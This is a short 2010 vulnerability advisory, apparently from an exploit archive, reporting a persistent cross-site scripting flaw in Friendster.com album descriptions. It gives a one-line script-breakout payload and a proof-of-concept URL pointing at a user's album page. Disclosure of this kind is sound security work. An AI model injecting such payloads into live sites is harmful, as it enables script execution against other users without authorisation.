friendster-xss.txt
Posted on 04 May 2010
#==================================================================================================# # # # $$$$$$$ $$ $$ $$ $$$$$$ # # $$ __$$ \__| $$ | $$ | $$ __$$ # # $$ | $$ |$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$ | $$ / $$ | # # $$$$$$$ |$$ |$$ _____|$$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ | $$$$$$$$ | # # $$ __$$ $$ |$$$$$$ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | # # $$ | $$ |$$ | \____$$ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | # # $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |$$$$$$$ $$ | $$ |$$$$$$ |$$ | $$ | $$ | # # \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| # # $$ | # # $$ | Plastics Make It Possible # # \__| # # # #==================================================================================================# # # # Vulnerability............Persistent XSS # # Software.................Friendster.com # # Date.....................5/2/10 # # # #==================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #==================================================================================================# # # # ##Description## # # # # Album description and a few other fields not properly escaped before being rendered into # # javascript. # # # # # # ##Exploit## # # # # ";alert(0);// # # # # # # ##Proof of Concept## # # # # http://www.friendster.com/viewalbums.php?uid=120927091 # # # #==================================================================================================#
